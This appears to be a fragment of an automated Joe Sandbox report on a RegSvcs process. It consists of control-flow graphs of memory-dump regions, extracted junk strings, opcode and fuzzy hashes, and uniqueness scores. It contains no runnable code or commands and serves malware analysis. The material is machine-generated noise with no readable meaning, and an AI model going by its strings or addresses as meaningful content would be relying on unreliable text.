                                                                                                                            control_flow_graph 0 6705e6e-6705e70 1 6705e72 0->1 2 6705e79-6705ee2 call 6703d88 0->2 1->2 3 6705ff1-6705ff6 1->3 4 6705ef3-6705f50 call 6703960 1->4 5 6705f55-6705f85 call 6703af0 1->5 6 670625a-6706276 1->6 7 6705ffb-6706037 1->7 8 6705fbc-6705fee call 6703af0 1->8 9 67060c0-67060dc 1->9 10 6705ee4-6705eed 1->10 11 67061e4-67061eb 1->11 12 6705f8a-6705fb7 call 6703af0 1->12 13 670604b-67060a9 call 6703960 1->13 14 67060ec-6706150 1->14 15 6705e6d 2->15 3->15 4->15 5->15 52 6706281 6->52 48 670778a-670779a 7->48 57 670603d-6706046 7->57 8->3 35 67060e2-67060e7 9->35 36 6706284 9->36 10->4 16 6706215 11->16 17 67061ed-67061f9 11->17 12->15 13->48 101 67060af-67060bb 13->101 106 6706152-6706158 14->106 107 670615a-6706160 14->107 15->0 27 670621b-670621d 16->27 23 6706203-6706209 17->23 24 67061fb-6706201 17->24 33 6706213 23->33 24->33 37 670623e-670624b 27->37 38 670621f-670622c 27->38 33->27 35->15 42 670628e-6706297 36->42 37->48 49 6706251-6706258 37->49 47 6706232-6706239 38->47 38->48 54 6706299 42->54 55 67062ac-67062b3 42->55 58 670623c 47->58 99 670779f-67077a2 48->99 49->58 52->36 54->55 59 67062f1-6706351 54->59 60 6706491-6706498 54->60 61 6706596-67065ee call 6703960 54->61 62 6706477 54->62 63 6706438-670643c 54->63 64 67063e8-67063f7 54->64 65 67062b9-67062c6 55->65 66 670647a 55->66 57->15 70 67061d8-67061db 58->70 149 6706353-6706359 59->149 150 670635b-6706361 59->150 79 67064c2 60->79 80 670649a-67064a6 60->80 81 670647c-670647f 61->81 62->66 74 670645d 63->74 75 670643e-6706447 63->75 97 6706417-6706424 64->97 98 67063f9-6706403 64->98 65->48 73 67062cc-67062dd 65->73 66->81 70->11 76 67061dd 70->76 73->48 83 67062e3-67062ef 73->83 88 6706460-670646c 74->88 86 6706449-670644c 75->86 87 670644e-6706451 75->87 76->6 76->11 76->52 76->55 76->59 76->60 76->61 76->62 76->63 76->64 94 67064c8-67064ce 79->94 92 67064b0-67064b6 80->92 93 67064a8-67064ae 80->93 81->60 91 6706481 81->91 83->42 100 670645b 86->100 87->100 88->62 91->60 91->61 102 6706488-67064da 91->102 103 67067b9-67067c0 91->103 104 67064c0 92->104 93->104 105 6707912-6707928 94->105 97->48 111 670642a-6706436 97->111 98->48 108 6706409-6706410 98->108 112 67077c3-67077ca 99->112 113 67077a4 99->113 100->88 101->15 124 67064e0-67064ed 102->124 125 6707045 102->125 109 67067c2-67067da 103->109 110 67067dc 103->110 104->94 117 670616a-670619f 106->117 107->117 118 6706415 108->118 119 67067e2-6706866 109->119 110->119 111->118 121 67077f4 112->121 122 67077cc-67077d8 112->122 113->112 120 6707871-6707880 113->120 151 67061a6-67061b2 call 67089e9 117->151 127 67063dc-67063df 118->127 119->81 120->99 120->105 133 67077fa-6707800 121->133 129 67077e2-67077e8 122->129 130 67077da-67077e0 122->130 124->48 132 67064f3-67064fd 124->132 128 670704a-670704d 125->128 127->64 140 67063e1 127->140 137 6707062-6707069 128->137 138 670704f 128->138 139 67077f2 129->139 130->139 132->81 142 670772d-6707743 137->142 143 670706f-6707074 137->143 145 6707123-6707171 call 6703960 138->145 146 6707087-670711e call 6703960 138->146 139->133 140->60 140->61 140->62 140->63 140->64 140->103 142->48 142->105 143->128 143->146 145->48 167 6707177-6707180 145->167 146->128 153 670636b-67063d7 149->153 150->153 157 67061b8-67061d3 151->157 153->127 157->70 167->128
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fbq$ fbq$ fbq$ fbq$ fbq$9\r$:H)$=H)$XPbq$XPbq$XPbq$XPbq$XPbq$\Obq$\Obq$\Obq$\Obq$\Obq
                                                                                                                            • API String ID: 0-1723862778
                                                                                                                            • Opcode ID: 0640d1a4716f330d48941d0037dc1188ef187cb9c07d18377a7ab7575b2fa9a6
                                                                                                                            • Instruction ID: 0dbb5ee73a33d837d3e8928ffc9e29fece8085d652ba9df6f012521787740cbb
                                                                                                                            • Opcode Fuzzy Hash: 0640d1a4716f330d48941d0037dc1188ef187cb9c07d18377a7ab7575b2fa9a6
                                                                                                                            • Instruction Fuzzy Hash: 26125970A40219DFEBA4DF58C961BE9B7F2BB44310F1081A5E509AB3C5DB709E81CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ]Yr$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-2105319476
                                                                                                                            • Opcode ID: 34d0e111698533dc683423dbbbf4b8a4d75c001551b6351eb1f7e2cce61b87a3
                                                                                                                            • Instruction ID: 72095336ea352ffafced209f9027d767ea9785fff816b624292d6c28efad3af4
                                                                                                                            • Opcode Fuzzy Hash: 34d0e111698533dc683423dbbbf4b8a4d75c001551b6351eb1f7e2cce61b87a3
                                                                                                                            • Instruction Fuzzy Hash: C0325F34A04318CFEBA8CB68C945BADB7B2FBC4301F14C6A6E509AB255D7359E81CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 420 6702535-6702538 421 6702541-6702550 420->421 422 670253a 420->422 426 6702556-6702566 421->426 444 67029c1-67029c6 421->444 422->421 423 6702731-670274b 422->423 424 67028a1-67028a7 422->424 425 6702602-670261a 422->425 422->426 427 67027c8-67027cf 422->427 428 6702639-670264f 422->428 429 67028fa-6702901 422->429 430 670261d-6702633 422->430 431 67026ce-67026d5 422->431 458 6702777 423->458 459 670274d-6702759 423->459 447 67028b1-67028b3 424->447 425->430 439 6702592 426->439 440 6702568-6702574 426->440 434 67027d1-67027e9 427->434 435 67027eb 427->435 460 6702655-670265b 428->460 461 67029dd 428->461 437 6702903-670290f 429->437 438 670292d 429->438 430->428 457 67029a5-67029aa 430->457 432 6702701 431->432 433 67026d7-67026e3 431->433 454 6702707-670271a 432->454 449 67026e5-67026eb 433->449 450 67026ed-67026fd 433->450 451 67027f1-6702816 434->451 435->451 452 6702911-6702917 437->452 453 6702919-6702929 437->453 456 6702933-670294e 438->456 448 6702598 439->448 445 6702576-670257c 440->445 446 670257e-670258e 440->446 463 6702962-6702965 444->463 462 6702590 445->462 446->462 475 67028bc-67028d4 447->475 530 6702598 call 67032b1 448->530 531 6702598 call 67033f4 448->531 464 67026ff 449->464 450->464 511 6702820-6702822 451->511 465 670292b 452->465 453->465 489 6702720 454->489 490 670295d 454->490 456->490 457->463 473 670277d-67027a9 458->473 467 6702763-6702773 459->467 468 670275b-6702761 459->468 469 6702669-67026c9 460->469 470 670265d-6702663 460->470 488 67029e2-67029e9 461->488 462->448 471 6702967 463->471 472 670296e-670297e 463->472 464->454 465->456 481 6702775 467->481 468->481 469->420 482 6702665 470->482 483 6702667 470->483 471->472 484 67029c8-67029db 471->484 485 6702989-670299f 471->485 486 67029ac-67029bb 471->486 472->461 487 6702980-6702987 472->487 515 67027b1-67027b3 473->515 502 67028e0-67028ea 475->502 503 67028d6 475->503 476 670259e-67025d8 516 67025df-67025eb 476->516 481->473 482->469 483->469 484->488 485->428 485->457 486->426 486->444 487->463 498 6702725-6702728 489->498 490->463 498->423 499 670272a 498->499 499->423 499->424 499->427 499->429 499->472 499->484 499->485 499->486 499->490 504 67027c1-67027c3 499->504 508 6702950-6702955 502->508 509 67028ec-67028f8 502->509 507 67028db 503->507 504->498 507->498 508->490 509->507 528 6702824 call 6706719 511->528 529 6702824 call 6705e6e 511->529 512 670282a-6702833 517 6702835-670284d 512->517 518 670284f 512->518 532 67027b5 call 6704840 515->532 533 67027b5 call 6704cef 515->533 522 67025f5-67025fd 516->522 519 6702855-670287a 517->519 518->519 526 6702884-6702889 519->526 521 67027bb 521->504 522->420 527 6702891-670289c 526->527 527->498 528->512 529->512 530->476 531->476 532->521 533->521
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fbq$ZYr$`OW$yM)$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-3639463074
                                                                                                                            • Opcode ID: 2c33227e4d5f9d8c9941f6a538e1abf6a1ecf29afc610bfadc5e235436dba913
                                                                                                                            • Instruction ID: 36dde26b891ff891db2143af8844081a3513f012de8433c698555faca93c0f21
                                                                                                                            • Opcode Fuzzy Hash: 2c33227e4d5f9d8c9941f6a538e1abf6a1ecf29afc610bfadc5e235436dba913
                                                                                                                            • Instruction Fuzzy Hash: DDC19035F00218CFFB649B64C958B6977F2AB84700F5084A5D95AAB3C5DB349E81CFA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 534 679eb30-679eb7c 535 679eb81-679eb84 534->535 536 679eb8d-679eb99 535->536 537 679eb86 535->537 555 679eb9f-679eba9 536->555 556 679ef5e-679ef66 536->556 537->536 538 679ec99-679ec9c 537->538 539 679ecfb-679ecfd 537->539 540 679ed30-679ed3c 537->540 541 679eed3-679eee2 537->541 542 679ed92-679ed99 537->542 543 679ecd2-679eceb 537->543 544 679ebd5-679ebd9 537->544 545 679ef08-679ef1b 537->545 546 679ebab-679ebae 537->546 547 679ec4b-679ec4e 537->547 548 679edab 537->548 549 679ed0d-679ed19 537->549 550 679ec8c-679ec94 537->550 551 679ecee-679ecf6 537->551 552 679edc0-679edc3 537->552 553 679ec83 537->553 554 679edc6-679edd6 537->554 561 679ecbd-679ecc1 538->561 562 679ec9e-679eca8 538->562 565 679ed09-679ed0b 539->565 566 679ecff 539->566 540->556 570 679ed42-679ed52 540->570 595 679ef01-679ef06 541->595 596 679eee4-679eeee 541->596 542->556 559 679ed9f-679eda6 542->559 543->551 567 679ebdb-679ebe4 544->567 568 679ebfc 544->568 571 679ef22 545->571 563 679ebce-679ebd3 546->563 564 679ebb0-679ebba 546->564 557 679ec6b-679ec6f 547->557 558 679ec50-679ec57 547->558 560 679edb0-679edb3 548->560 549->556 569 679ed1f-679ed2b 549->569 550->535 551->535 552->554 576 679ec89 553->576 592 679edf9 554->592 593 679edd8-679ede1 554->593 555->535 557->556 574 679ec75-679ec81 557->574 558->556 572 679ec5d-679ec61 558->572 559->535 560->541 575 679edb9 560->575 561->556 579 679ecc7-679ecd0 561->579 562->556 578 679ecae-679ecb5 562->578 582 679ebcc 563->582 564->556 581 679ebc0-679ebc7 564->581 583 679ed04 565->583 566->583 585 679ebeb-679ebf8 567->585 586 679ebe6-679ebe9 567->586 587 679ebff-679ec37 568->587 569->535 570->556 588 679ed58-679ed6e 570->588 571->556 591 679ec66 572->591 574->591 575->541 575->545 575->552 575->554 576->550 594 679ecb8 578->594 579->594 581->582 582->535 583->535 597 679ebfa 585->597 586->597 587->556 589 679ec3d-679ec46 587->589 588->556 590 679ed74-679ed7f 588->590 589->535 598 679ed8b-679ed90 590->598 599 679ed81 590->599 591->535 602 679edfc-679ee50 592->602 600 679ede8-679edf5 593->600 601 679ede3-679ede6 593->601 594->535 607 679eefc 595->607 604 679ef1d 596->604 605 679eef0-679eef7 596->605 597->587 608 679ed86 598->608 599->608 609 679edf7 600->609 601->609 617 679ee52-679ee54 602->617 618 679ee56-679ee62 602->618 604->571 605->607 607->560 608->535 609->602 619 679ee64-679ee8f 617->619 618->619 624 679ee91-679eea3 619->624 625 679eea5 619->625 626 679eea8-679eeb6 624->626 625->626 628 679eeb8 626->628 629 679eeba-679eec6 626->629 630 679eec8-679eecc 628->630 629->630 630->541
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$`Q]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-2063487809
                                                                                                                            • Opcode ID: 1ad3fe9fbe6543eb76aee3e7e35b1bceee154abffb41ca1a82ca17011b228591
                                                                                                                            • Instruction ID: 5587dd65716b41a762102584c1075fcb4f4d7b1aaf1996d2db3743d24aeeb7fa
                                                                                                                            • Opcode Fuzzy Hash: 1ad3fe9fbe6543eb76aee3e7e35b1bceee154abffb41ca1a82ca17011b228591
                                                                                                                            • Instruction Fuzzy Hash: 21B18D30E00254CFEF94CBA8E854AB97BF2AF45304F14C56AE4169B395DB74D885CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 632 6700926-670093c 633 670093d-6700940 632->633 634 6700942 633->634 635 6700949-6700955 633->635 634->635 636 6700ab1-6700ac7 634->636 637 6700c72-6700c76 634->637 638 67009b6-67009b8 634->638 639 6700b16-6700b18 634->639 640 6700a37-6700a41 634->640 641 6700a58 634->641 642 6700b1b-6700b25 634->642 643 6700b3c-6700b4f 634->643 644 67009df-67009eb 634->644 645 6700a02-6700a05 634->645 646 6700c42-6700c4a 634->646 647 6700c04-6700c06 634->647 648 6700a69-6700aaf 634->648 649 6700c4f-6700c62 634->649 650 6700d01-6700d5a 635->650 651 670095b-670096e 635->651 683 6700ad9 636->683 684 6700ac9-6700ad7 636->684 664 6700c78-6700c81 637->664 665 6700c8c 637->665 653 67009c4-67009cb 638->653 654 67009ba 638->654 639->642 640->650 663 6700a47-6700a4e 640->663 662 6700a5d-6700a60 641->662 657 6700cb6-6700cd4 642->657 658 6700b2b-6700b37 642->658 643->657 689 6700b55-6700b5b 643->689 644->650 659 67009f1-67009fd 644->659 660 6700a21-6700a28 645->660 661 6700a07-6700a0e 645->661 646->662 655 6700c22 647->655 656 6700c08-6700c0e 647->656 648->662 691 6700c64 649->691 692 6700c6b-6700c70 649->692 732 6700d62 650->732 733 6700d5c-6700d60 650->733 651->650 652 6700974-6700984 651->652 652->650 667 670098a-670099f 652->667 653->650 671 67009d1-67009dd 653->671 668 67009bf 654->668 672 6700c24-6700c2e 655->672 669 6700c10-6700c12 656->669 670 6700c14-6700c16 656->670 712 6700cdb-6700cdd 657->712 658->662 659->633 660->650 675 6700a2e-6700a35 660->675 661->650 674 6700a14-6700a1a 661->674 662->648 678 6700a62 662->678 663->641 679 6700c83-6700c86 664->679 680 6700c88 664->680 682 6700c8f-6700cb4 665->682 667->650 686 67009a5-67009b4 667->686 668->633 687 6700c20 669->687 670->687 671->668 672->657 688 6700c34-6700c3d 672->688 690 6700a1c 674->690 675->690 678->636 678->637 678->639 678->642 678->643 678->646 678->647 678->648 678->649 694 6700c8a 679->694 680->694 682->712 696 6700adb-6700b03 call 6700f09 683->696 684->696 686->633 687->672 688->662 697 6700b79 689->697 698 6700b5d-6700b63 689->698 690->633 699 6700c66 691->699 692->699 694->682 717 6700b09-6700b11 696->717 706 6700b7b-6700ba9 697->706 703 6700b65-6700b67 698->703 704 6700b69-6700b75 698->704 699->662 710 6700b77 703->710 704->710 726 6700bbb 706->726 727 6700bab-6700bb9 706->727 710->706 718 6700cf7-6700d00 712->718 719 6700cdf-6700ce5 712->719 717->662 721 6700ce7 719->721 722 6700ce9-6700cf5 719->722 721->718 722->718 728 6700bbd-6700bf1 726->728 727->728 742 6700bf3 728->742 743 6700bfd-6700c02 728->743 735 6700d64-6700d69 732->735 736 6700d6a 732->736 733->732 735->736 737 6700d72-6700d94 736->737 738 6700d6c-6700d71 736->738 740 6700db6-6700dbb 737->740 741 6700d96-6700d99 737->741 738->737 740->741 745 6700da2-6700db4 741->745 746 6700d9b 741->746 744 6700bf8 742->744 743->744 744->662 745->741 746->740 746->745 747 6700e73-6700e86 746->747 748 6700e15-6700e40 746->748 749 6700e45-6700e50 746->749 750 6700e89-6700e8e 746->750 751 6700dfb-6700e04 746->751 752 6700dbd-6700dd3 746->752 748->741 755 6700e93-6700ea2 749->755 757 6700e52-6700e63 749->757 750->741 751->755 756 6700e0a-6700e13 751->756 752->741 756->741 757->755 760 6700e65-6700e6e 757->760 760->741
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: SYr$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-563465331
                                                                                                                            • Opcode ID: 5787ccc6b8dc4e1a7e6cb4bb7e14d8ae167347db2e06a5124462221a9369d96f
                                                                                                                            • Instruction ID: 5ec1366d66880111f686d0bbead5ea0ec4dfa9f0b20ca4fe457e273b18024f31
                                                                                                                            • Opcode Fuzzy Hash: 5787ccc6b8dc4e1a7e6cb4bb7e14d8ae167347db2e06a5124462221a9369d96f
                                                                                                                            • Instruction Fuzzy Hash: 94D1E130F04204CFF7948B68D950B7A7BE2EB46721F28C166E5599B2D2D678EC41CBB1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \Obq$\Obq$\Obq$\Obq$\Obq$$]q$$]q
                                                                                                                            • API String ID: 0-1179055013
                                                                                                                            • Opcode ID: 04e6847c5be210703d7b4c019cbc25afcaac08453c49190944354c49fca0bdb4
                                                                                                                            • Instruction ID: 57e12765648bd35755125a9bf67e8abf6d00d778d2925a093b627e0b48cc1a3d
                                                                                                                            • Opcode Fuzzy Hash: 04e6847c5be210703d7b4c019cbc25afcaac08453c49190944354c49fca0bdb4
                                                                                                                            • Instruction Fuzzy Hash: 72D1C270D05155CFF794CFB8C90466AB7FAAF82341F18816AD6129B2E9C774A841CFB1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-3723351465
                                                                                                                            • Opcode ID: 8fb5ba53b554f46c820d4dc991a868cf1acdca580a9385724b1ffa26c74d1d9a
                                                                                                                            • Instruction ID: a39d2d1da04e5a17a02eeba7bbf5e120157529e040d9efe3c3b3f647b0bf66c5
                                                                                                                            • Opcode Fuzzy Hash: 8fb5ba53b554f46c820d4dc991a868cf1acdca580a9385724b1ffa26c74d1d9a
                                                                                                                            • Instruction Fuzzy Hash: B9224D30E00229CFDBA8CF58C955BE9B7B2BF84301F1486D5D619AB295C7749E81CF92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1306 679247d-679249a 1308 679249c-67924ae 1306->1308 1309 67924b0 1306->1309 1310 67924b3-67924c8 1308->1310 1309->1310 1311 67924d3-67924d6 1310->1311 1312 67924db-67924de 1311->1312 1313 67924e0 1312->1313 1314 67924e7-67924eb 1312->1314 1313->1314 1315 679254d-6792570 1313->1315 1316 67925c1-67925d7 1313->1316 1317 67925a2-67925bb 1313->1317 1318 6792575-679259c 1313->1318 1319 67924ed-67924f6 1314->1319 1320 679250c 1314->1320 1334 6792df8 1315->1334 1331 67925dd-67925e8 1316->1331 1332 6792df3 1316->1332 1317->1316 1335 6792dd7-6792ddc 1317->1335 1318->1317 1321 67924f8-67924fb 1319->1321 1322 67924fd-6792500 1319->1322 1323 679250f-6792511 1320->1323 1327 679250a 1321->1327 1322->1327 1329 6792513-6792520 1323->1329 1330 6792534-679253e 1323->1330 1327->1323 1329->1332 1336 6792526-679252d 1329->1336 1330->1332 1333 6792544-679254b 1330->1333 1339 6792609 1331->1339 1340 67925ea-67925f3 1331->1340 1332->1334 1338 6792532 1333->1338 1337 6792dfd-6792e00 1334->1337 1342 6792d8a-6792d8d 1335->1342 1336->1338 1343 6792e09-6792e0d 1337->1343 1344 6792e02 1337->1344 1338->1312 1347 679260c-6792613 1339->1347 1345 67925fa-67925fd 1340->1345 1346 67925f5-67925f8 1340->1346 1348 6792d8f 1342->1348 1349 6792db1-6792db9 1342->1349 1352 6792e0f-6792e18 1343->1352 1353 6792e2e 1343->1353 1344->1343 1350 6792e89 1344->1350 1351 6792e6b-6792e7e 1344->1351 1354 6792607 1345->1354 1346->1354 1355 6792629 1347->1355 1356 6792615-6792627 1347->1356 1348->1343 1348->1349 1348->1350 1348->1351 1357 6792dbb-6792dd1 1348->1357 1358 6792dde-6792df1 1348->1358 1349->1342 1363 6792e8a 1350->1363 1351->1350 1359 6792e1a-6792e1d 1352->1359 1360 6792e1f-6792e22 1352->1360 1361 6792e31-6792e33 1353->1361 1354->1347 1362 679262c-679264c 1355->1362 1356->1362 1357->1316 1357->1335 1358->1334 1364 6792e2c 1359->1364 1360->1364 1365 6792e50-6792e5d 1361->1365 1366 6792e35-6792e42 1361->1366 1374 6792651-6792654 1362->1374 1363->1363 1364->1361 1369 6792e8c-6792ef3 1365->1369 1370 6792e5f-6792e69 1365->1370 1366->1369 1371 6792e44-6792e4b 1366->1371 1370->1351 1373 6792e4e 1370->1373 1371->1373 1373->1337 1375 679265d-6792661 1374->1375 1376 6792656 1374->1376 1381 6792663-679266c 1375->1381 1382 6792682 1375->1382 1376->1375 1378 6792a0a-6792a0e 1376->1378 1379 679277a-67927b5 1376->1379 1380 6792762-6792775 1376->1380 1384 6792a10-6792a22 1378->1384 1385 6792a24 1378->1385 1423 67927cd-67927dd 1379->1423 1424 67927b7-67927bd 1379->1424 1388 6792d1c 1380->1388 1386 679266e-6792671 1381->1386 1387 6792673-6792676 1381->1387 1389 6792685-6792687 1382->1389 1390 6792a27-6792a3d 1384->1390 1385->1390 1391 6792680 1386->1391 1387->1391 1395 6792d21-6792d24 1388->1395 1392 6792689 1389->1392 1393 6792690-679269a 1389->1393 1411 6792a49-6792a4e 1390->1411 1412 6792a3f 1390->1412 1391->1389 1397 679268e 1392->1397 1398 67926a0-67926a4 1393->1398 1399 6792d17 1393->1399 1400 6792d2d-6792d31 1395->1400 1401 6792d26 1395->1401 1397->1374 1398->1380 1398->1397 1399->1388 1407 6792d33-6792d3c 1400->1407 1408 6792d52 1400->1408 1401->1343 1401->1349 1401->1350 1401->1351 1401->1357 1401->1358 1401->1400 1405 6792d82 1401->1405 1406 6792d64-6792d77 1401->1406 1405->1342 1406->1405 1413 6792d3e-6792d41 1407->1413 1414 6792d43-6792d46 1407->1414 1410 6792d55-6792d57 1408->1410 1420 6792d59 1410->1420 1421 6792d5d-6792d62 1410->1421 1417 6792a44 1411->1417 1412->1417 1419 6792d50 1413->1419 1414->1419 1417->1374 1419->1410 1422 6792d5b 1420->1422 1421->1406 1421->1422 1422->1395 1423->1399 1427 67927e3-67927ed 1423->1427 1425 67927bf 1424->1425 1426 67927c1-67927c3 1424->1426 1425->1423 1426->1423 1427->1374
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q$$]q$$]q$$]q$$]q
                                                                                                                            • API String ID: 0-477462128
                                                                                                                            • Opcode ID: 14f84a93b731c858bda7a3206a9fb3c02fdeb24eb02f94ae63ff411229cd2caf
                                                                                                                            • Instruction ID: 1e8ef2a401c419c73d1b02d00e2a2de289cf29af7cbd58ffe66bc574efe74d16
                                                                                                                            • Opcode Fuzzy Hash: 14f84a93b731c858bda7a3206a9fb3c02fdeb24eb02f94ae63ff411229cd2caf
                                                                                                                            • Instruction Fuzzy Hash: 3EC13030A14118DFEFA4EBA8E554BAD77F1BF40301F208569D426AB696C7349E41CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1518 68af4d0-68af4f4 1519 68af4f9-68af4fc 1518->1519 1520 68af90a-68af90c 1519->1520 1521 68af502 1519->1521 1524 68af96f-68af987 1520->1524 1525 68af882-68af890 1520->1525 1523 68af509-68af8e1 1521->1523 1527 68af7f1-68af7f4 1523->1527 1525->1527 1529 68af7fd-68af80b 1527->1529 1530 68af7f6 1527->1530 1529->1519 1537 68af811-68af813 1529->1537 1530->1520 1530->1523 1530->1529 1531 68af7bb-68af7be 1530->1531 1532 68af8b8-68af923 1530->1532 1533 68af7a2-68af7a5 1530->1533 1534 68af513-68af59b call 68a96f0 1530->1534 1535 68af8d6-68af8d8 1530->1535 1536 68af7c5-68af7ca 1530->1536 1540 68af7d8-68af7df 1531->1540 1541 68af7c0-68af92f 1531->1541 1532->1527 1538 68af7ab-68af963 1533->1538 1539 68af86e-68af873 1533->1539 1566 68af5a6-68af5ab 1534->1566 1542 68af8da 1535->1542 1543 68af942-68af949 1535->1543 1536->1527 1537->1519 1550 68af968-68af96a 1538->1550 1539->1550 1540->1524 1548 68af7e5-68af7ec 1540->1548 1541->1524 1553 68af931-68af938 1541->1553 1542->1524 1554 68af8ac-68af8b3 1542->1554 1543->1524 1551 68af94b-68af952 1543->1551 1552 68af93b-68af93d 1548->1552 1550->1527 1555 68af957-68af95e 1551->1555 1552->1527 1553->1552 1554->1555 1555->1519 1567 68af6bf-68af6c2 1566->1567 1568 68af6d2-68af6ee 1567->1568 1569 68af6c4 1567->1569 1571 68af6cb-68af6d0 1568->1571 1590 68af6f0 1568->1590 1569->1520 1569->1523 1569->1531 1569->1532 1569->1533 1569->1534 1569->1535 1569->1536 1569->1568 1570 68af60b-68af61e 1569->1570 1569->1571 1572 68af748-68af762 1569->1572 1573 68af726-68af742 1569->1573 1574 68af787 1569->1574 1575 68af5b2-68af5e0 1569->1575 1576 68af6f7-68af711 1569->1576 1587 68af620-68af629 1570->1587 1588 68af641 1570->1588 1579 68af6f5 1571->1579 1572->1574 1618 68af744-68af746 1573->1618 1619 68af724 1573->1619 1585 68af78a-68af81c 1574->1585 1613 68af5f8-68af607 1575->1613 1614 68af5e2-68af5e8 1575->1614 1582 68af764-68af767 1576->1582 1579->1567 1582->1573 1589 68af769 1582->1589 1606 68af81e-68af827 1585->1606 1607 68af83f 1585->1607 1592 68af62b-68af62e 1587->1592 1593 68af630-68af63d 1587->1593 1596 68af644-68af6bd 1588->1596 1589->1520 1589->1523 1589->1531 1589->1532 1589->1533 1589->1534 1589->1535 1589->1536 1589->1572 1589->1573 1589->1574 1594 68af770-68af777 1589->1594 1590->1579 1601 68af63f 1592->1601 1593->1601 1594->1585 1602 68af779-68af780 1594->1602 1596->1568 1601->1596 1604 68af785 1602->1604 1604->1582 1611 68af829-68af82c 1606->1611 1612 68af82e-68af83b 1606->1612 1609 68af842-68af86d 1607->1609 1620 68af83d 1611->1620 1612->1620 1616 68af609 1613->1616 1617 68af5b0 1613->1617 1621 68af5ea 1614->1621 1622 68af5ec-68af5ee 1614->1622 1616->1617 1617->1570 1618->1604 1619->1594 1620->1609 1621->1613 1622->1613
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
